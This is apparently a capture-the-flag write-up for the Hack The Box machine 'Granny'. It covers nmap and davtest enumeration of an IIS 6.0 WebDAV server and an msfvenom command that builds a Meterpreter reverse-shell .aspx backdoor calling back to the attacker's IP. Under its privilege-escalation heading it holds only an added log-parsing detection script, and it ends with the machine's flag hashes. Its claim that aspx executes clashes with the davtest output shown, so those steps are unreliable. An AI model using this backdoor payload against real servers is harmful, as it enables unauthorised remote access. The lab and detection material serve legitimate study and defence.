Granny - 18.08.2021
NMap
┌──(kali㉿kali)-[~/htb/granny]
└─$ nmap -sC -sV 10.10.10.15
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-18 13:27 CEST
Nmap scan report for 10.10.10.15
Host is up (0.059s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
| http-methods:
|_ Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan:
| WebDAV type: Unknown
| Server Date: Wed, 18 Aug 2021 11:29:31 GMT
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|_ Server Type: Microsoft-IIS/6.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
IIS 6.0 = Windows Server 2003
Davtest
┌──(kali㉿kali)-[~/htb/granny]
└─$ davtest -url http://10.10.10.15
perl: warning: Setting locale failed.
perl: warning: Please check that your locale settings:
LANGUAGE = "en_US:en",
LC_ALL = (unset),
LC_TIME = "pl_PL.UTF-8",
LANG = "en_US.UTF-8"
are supported and installed on your system.
perl: warning: Falling back to a fallback locale ("en_US.UTF-8").
********************************************************
Testing DAV connection
OPEN SUCCEED: http://10.10.10.15
********************************************************
NOTE Random string for this session: HOZXuPVDnnbK
********************************************************
Creating directory
MKCOL SUCCEED: Created http://10.10.10.15/DavTestDir_HOZXuPVDnnbK
********************************************************
Sending test files
PUT shtml FAIL
PUT cfm SUCCEED: http://10.10.10.15/DavTestDir_HOZXuPVDnnbK/davtest_HOZXuPVDnnbK.cfm
PUT php SUCCEED: http://10.10.10.15/DavTestDir_HOZXuPVDnnbK/davtest_HOZXuPVDnnbK.php
PUT aspx FAIL
PUT pl SUCCEED: http://10.10.10.15/DavTestDir_HOZXuPVDnnbK/davtest_HOZXuPVDnnbK.pl
PUT jsp SUCCEED: http://10.10.10.15/DavTestDir_HOZXuPVDnnbK/davtest_HOZXuPVDnnbK.jsp
PUT asp FAIL
PUT cgi FAIL
PUT jhtml SUCCEED: http://10.10.10.15/DavTestDir_HOZXuPVDnnbK/davtest_HOZXuPVDnnbK.jhtml
PUT txt SUCCEED: http://10.10.10.15/DavTestDir_HOZXuPVDnnbK/davtest_HOZXuPVDnnbK.txt
PUT html SUCCEED: http://10.10.10.15/DavTestDir_HOZXuPVDnnbK/davtest_HOZXuPVDnnbK.html
********************************************************
Checking for test file execution
EXEC cfm FAIL
EXEC php FAIL
EXEC pl FAIL
EXEC jsp FAIL
EXEC jhtml FAIL
EXEC txt SUCCEED: http://10.10.10.15/DavTestDir_HOZXuPVDnnbK/davtest_HOZXuPVDnnbK.txt
EXEC html SUCCEED: http://10.10.10.15/DavTestDir_HOZXuPVDnnbK/davtest_HOZXuPVDnnbK.html
********************************************************
/usr/bin/davtest Summary:
Created: http://10.10.10.15/DavTestDir_HOZXuPVDnnbK
PUT File: http://10.10.10.15/DavTestDir_HOZXuPVDnnbK/davtest_HOZXuPVDnnbK.cfm
PUT File: http://10.10.10.15/DavTestDir_HOZXuPVDnnbK/davtest_HOZXuPVDnnbK.php
PUT File: http://10.10.10.15/DavTestDir_HOZXuPVDnnbK/davtest_HOZXuPVDnnbK.pl
PUT File: http://10.10.10.15/DavTestDir_HOZXuPVDnnbK/davtest_HOZXuPVDnnbK.jsp
PUT File: http://10.10.10.15/DavTestDir_HOZXuPVDnnbK/davtest_HOZXuPVDnnbK.jhtml
PUT File: http://10.10.10.15/DavTestDir_HOZXuPVDnnbK/davtest_HOZXuPVDnnbK.txt
PUT File: http://10.10.10.15/DavTestDir_HOZXuPVDnnbK/davtest_HOZXuPVDnnbK.html
Executes: http://10.10.10.15/DavTestDir_HOZXuPVDnnbK/davtest_HOZXuPVDnnbK.txt
Executes: http://10.10.10.15/DavTestDir_HOZXuPVDnnbK/davtest_HOZXuPVDnnbK.html
PUT, MOVE and DELETE are allowed
PHP does not execute, but aspx does
Creating the .aspx backdoor
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.19 LPORT=9004 -f aspx >backdoor.aspx
Uploading the backdoor
In msfconsole set the same payload! Otherwise it won't work
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST tun0
set LPORT 9004
run
And we have access
Privilege Escalation
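As an added defender-side example (not part of the original writeup), the following Python script parses IIS W3C extended log lines and flags the WebDAV write methods that the nmap and davtest output above revealed. The log lines are constructed to mirror the davtest session, and the default IIS 6.0 field set is an assumption.

```python
# Methods that modify content on a WebDAV-enabled IIS site; all appear in the nmap output above.
WEBDAV_WRITE_METHODS = {"PUT", "MOVE", "COPY", "DELETE", "MKCOL", "PROPPATCH"}
SCRIPT_EXTENSIONS = (".asp", ".aspx", ".php", ".cfm", ".jsp", ".pl", ".cgi", ".shtml")

# Constructed sample log (assumption: IIS 6.0 default W3C field set), modelled on the davtest run.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2021-08-18 11:29:30 10.10.10.15 GET /index.htm - 80 - 10.10.14.19 Mozilla/5.0 200 0 0
2021-08-18 11:29:31 10.10.10.15 MKCOL /DavTestDir_HOZXuPVDnnbK - 80 - 10.10.14.19 DAV+test 201 0 0
2021-08-18 11:29:32 10.10.10.15 PUT /DavTestDir_HOZXuPVDnnbK/davtest_HOZXuPVDnnbK.aspx - 80 - 10.10.14.19 DAV+test 403 0 0
2021-08-18 11:29:32 10.10.10.15 PUT /DavTestDir_HOZXuPVDnnbK/davtest_HOZXuPVDnnbK.txt - 80 - 10.10.14.19 DAV+test 201 0 0
2021-08-18 11:29:33 10.10.10.15 MOVE /DavTestDir_HOZXuPVDnnbK/davtest_HOZXuPVDnnbK.txt - 80 - 10.10.14.19 DAV+test 201 0 0
"""

def parse_w3c(text):
    """Yield one dict per request, keyed by the names in the #Fields header."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))

def classify(rec):
    """Severity of a WebDAV write request, or None if the request is not a write."""
    method, uri, status = rec["cs-method"], rec["cs-uri-stem"], int(rec["sc-status"])
    if method not in WEBDAV_WRITE_METHODS:
        return None
    if not 200 <= status < 300:
        return "low"      # the server rejected the write (like the PUT of .aspx above)
    # The MOVE/COPY destination travels in a request header that the default field set does
    # not log, so a successful MOVE may have just renamed an innocuous .txt to a script.
    if method in ("MOVE", "COPY") or uri.lower().endswith(SCRIPT_EXTENSIONS):
        return "high"
    return "medium"       # e.g. MKCOL, or an upload with a non-script extension

def find_webdav_writes(text):
    """Return [(client_ip, method, uri, status, severity)] for every write request in the log."""
    hits = []
    for rec in parse_w3c(text):
        sev = classify(rec)
        if sev:
            hits.append((rec["c-ip"], rec["cs-method"], rec["cs-uri-stem"], rec["sc-status"], sev))
    return hits

if __name__ == "__main__":
    for hit in find_webdav_writes(SAMPLE_LOG):
        print("%-6s %s %s %s -> %s" % (hit[4], hit[0], hit[1], hit[2], hit[3]))
```

On a hardened host the same script should return nothing but "low" entries, since WebDAV write methods would be disabled or rejected for unauthenticated clients.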
user.txt
700c5dc163014e22b3e408f8703f67d1
root.txt
aa4beed1c0584445ab463a6747bd06e9